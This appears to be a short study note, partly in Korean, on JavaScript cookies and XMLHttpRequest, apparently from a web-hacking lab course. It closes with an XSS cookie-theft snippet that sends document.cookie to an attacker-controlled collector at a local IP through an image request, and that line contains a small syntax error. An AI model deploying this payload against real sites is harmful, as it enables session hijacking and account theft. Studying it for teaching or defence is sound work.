document.cookie
let cookie = document.cookie;
console.log(cookie);
XMLHttpRequest
XMLHttpRequest (XHR) 객체는 서버와 상호작용할 때 사용한다. XHR을 사용하면 페이지의 새로고침 없이도 URL에서 데이터를 가져올 수 있다.
readystatechange
readyState 속성이 바뀔 때마다 발생한다. onreadystatechange 속성으로도 수신할 수 있다.
XHR.readyState
XHR.readyState property returns the state an XHR client is in. An XHR client exists in one of the following states:
| Value | State | Description |
| 0 | UNSENT | Client has been created. open() not called yet. |
| 1 | OPENED | open() has been called. |
| 2 | HEADERS_RECEIVED | send() has been called, and headers and status are available. |
| 3 | LOADING | Downloading; responseText holds partial data. |
| 4 | DONE | The operation is complete. |
let http = new XMLHttpRequest();
let url = "http://192.168.0.8:1018/4th/cookie.php";
http.open("GET", url);
http.send();
http.onreadystatechange = (e) => {
console.log("http.responseText: ")
console.log(http.responseText);
}
let cookieData = document.cookie;
let attackUrl = "http://192.168.0.8:1018/4th/cookie.php";
let img = new Image().src = attackUrl "?" + cookieData;